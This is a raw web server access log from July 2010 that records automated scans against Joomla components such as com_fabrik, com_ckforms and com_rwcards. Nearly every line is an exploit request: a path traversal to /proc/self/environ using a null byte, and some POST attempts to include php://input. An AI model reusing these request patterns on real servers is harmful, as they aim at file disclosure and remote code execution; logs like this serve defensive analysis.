222.124.193.12 - - [26/Jul/2010:03:26:01 +0200] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:31:02 +0200] "GET /logs/access_log/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:31:02 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:31:03 +0200] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 797 "-" "libwww-perl/5.805"
112.104.57.22 - - [26/Jul/2010:03:38:14 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:38:15 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:38:16 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:15 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:15 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:40:17 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:20 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:20 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:20 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:21 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:30 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:41 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:41 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:42:45 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:43:13 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:43:13 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:43:20 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:50:48 +0200] "GET /logs/access_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:50:48 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:50:49 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:51:22 +0200] "GET /logs/access_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:51:23 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:51:24 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:51:39 +0200] "GET /logs/access_log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:51:40 +0200] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:51:40 +0200] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:56:16 +0200] "GET /logs//index.php?option=com_loginbox&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:56:16 +0200] "GET /logs//index.php?option=com_loginbox&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:56:17 +0200] "GET //index.php?option=com_loginbox&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:56:17 +0200] "GET //index.php?option=com_loginbox&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:56:17 +0200] "GET /logs//index.php?option=com_loginbox&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:03:56:18 +0200] "GET //index.php?option=com_loginbox&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
64.6.98.41 - - [26/Jul/2010:04:04:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:04:30 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
94.247.176.194 - - [26/Jul/2010:04:05:08 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:04:05:09 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
64.6.98.41 - - [26/Jul/2010:04:05:19 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:05:19 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:05:22 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:05:22 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
91.121.67.226 - - [26/Jul/2010:04:05:37 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:04:05:37 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
64.6.98.41 - - [26/Jul/2010:04:05:50 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:05:50 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:05:51 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
78.41.233.128 - - [26/Jul/2010:04:06:23 +0200] "GET /logs/index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:04:06:23 +0200] "GET /index.php?option=com_myblog&Itemid=24&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
64.6.98.41 - - [26/Jul/2010:04:08:12 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:08:16 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:08:22 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
112.104.57.22 - - [26/Jul/2010:04:20:50 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:20:50 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:20:51 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:20:54 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:20:54 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:20:55 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:21:37 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:21:38 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:21:38 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:29:55 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:29:55 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:29:56 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:29:56 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:29:56 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:29:57 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
64.6.98.41 - - [26/Jul/2010:04:30:38 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:38 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:38 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:38 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:38 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:38 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:51 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:52 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:30:52 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
112.104.57.22 - - [26/Jul/2010:04:31:33 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:31:34 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:04:31:35 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
64.6.98.41 - - [26/Jul/2010:04:53:35 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:53:35 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:53:36 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:55:26 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:55:26 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:55:26 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
213.215.178.34 - - [26/Jul/2010:04:56:03 +0200] "GET /logs/access_log/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:04:56:03 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:04:56:03 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:04:56:06 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
64.6.98.41 - - [26/Jul/2010:04:59:52 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:59:52 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:04:59:52 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
213.215.178.34 - - [26/Jul/2010:05:00:07 +0200] "POST /index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:10 +0200] "POST /logs/index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:10 +0200] "POST /index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.127.248.175 - - [26/Jul/2010:05:00:16 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:00:16 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:05:00:17 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
213.215.178.34 - - [26/Jul/2010:05:00:17 +0200] "POST /logs/access_log/index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.127.248.175 - - [26/Jul/2010:05:00:17 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
213.215.178.34 - - [26/Jul/2010:05:00:17 +0200] "POST /index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:00:17 +0200] "POST /logs/index.php?option=com_perchaimageattach&controller=php://input HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
